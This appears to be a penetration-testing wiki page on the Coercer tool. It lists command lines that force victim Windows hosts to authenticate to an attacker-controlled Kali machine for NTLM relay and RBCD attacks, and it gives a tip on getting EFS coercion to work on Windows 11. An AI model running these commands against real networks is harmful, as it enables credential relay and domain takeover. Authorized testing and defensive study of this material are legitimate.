# coercer.py
[Coercer](https://github.com/p0dalirius/Coercer) coerces things to talk to other things!

## Scan a host to see if it can be leveraged to coerce authentication
```
coercer.py scan -u lowpriv -p 'pass123!' -t some.victim.host
```

## Coerce auth from a victim to a system of your choice
```
coercer.py coerce -u 7ms -p 'pass' -t SOME.VICTIM.IP.ADDY -l LOCAL.KALI.IP.ADDY
```

## Coerce using a text list of targets
```
coercer.py coerce -u 7ms -p 'pass' --targets-file list-of-victims.txt -l LOCAL.KALI.IP.ADDY
```

## Coerce using a specific method name (that you cleaned from the SCAN mode)
This example uses `EpsRpcFileKeyInfo`:

```
coercer.py coerce -u lowpriv -p 'password1' -t target.for.coercer.attack -l your.kali.ip.addy --filter-method-name EpsRpcFileKeyInfo
```

## Coerce Web auth from a victim to pull off the RBCD attack
```
coercer.py coerce --auth-type http -l your.local.kali.ip -t ip.of.victim.machine -d domain.com -u lowpriv -p 'P@ssw0rd1' --filter-protocol-name MS-EFS
```

*(More info about this in the [ntlmrelay](/pentesting/Internal/ntlmrelayx) section)*

## Troubleshooting
!!!tip
I learned in [this BloodHound Slack thread](https://bloodhoundhq.slack.com/archives/C02JG9SE3FX/p1758810277947529) that (public) coercer shenanigans won't work on Windows 11 (at least not Win11 23H2).  One user notes a way that might work to get EFS coercion to work:

*EFS is not running by default on Windows 11 so that's why coercion will not work. If you can somehow drop an encrypted file on the machine, Explorer will automatically start EFS once it sees it, IIRC.*

ALSO!  Check the [rpc2efs.py](/pentesting/internal/rpc2efs) as you might be able to get EFS running on a Windows 11 Enterprise box without authentication!
!!!